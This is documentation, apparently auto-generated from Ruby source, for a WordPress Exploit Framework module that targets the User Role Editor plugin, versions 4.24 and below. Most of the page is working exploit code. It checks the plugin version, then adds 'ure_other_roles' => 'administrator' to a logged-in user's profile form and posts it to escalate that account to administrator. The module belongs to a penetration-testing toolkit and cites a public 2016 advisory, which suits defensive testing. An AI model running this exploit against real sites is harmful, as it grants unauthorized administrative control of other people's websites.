class Wpxf::Auxiliary::UserRoleEditorPrivilegeEscalation

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 6
def initialize
  super

  update_info(
    name: 'User Role Editor <= 4.24 Privilege Escalation',
    desc: 'The User Role Editor plugin, in versions 4.24 and below, '\
          'allows authenticated users to escalate their user role to '\
          'that of an administrator.',
    author: [
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '8432'],
      ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
    ],
    date: 'Apr 04 2016'
  )
end

Public Instance Methods

build_update_body() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 33
def build_update_body
  fields = wordpress_user_profile_form_fields(session_cookie)
  return nil unless fields
  fields.merge('ure_other_roles' => 'administrator')
end
check() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 25
def check
  check_plugin_version_from_readme('user-role-editor', '4.25')
end
requires_authentication() click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 29
def requires_authentication
  true
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb, line 39
def run
  return false unless super

  body = build_update_body
  unless body
    emit_error 'Failed to build payload'
    return false
  end

  res = execute_post_request(url: wordpress_url_admin_profile, body: body, cookie: session_cookie)
  unless res.code == 302 || res.code == 200
    emit_error "Request returned code #{res.code}"
    return false
  end

  emit_success "User role for #{datastore['username']} has been escalated to administrator"
  true
end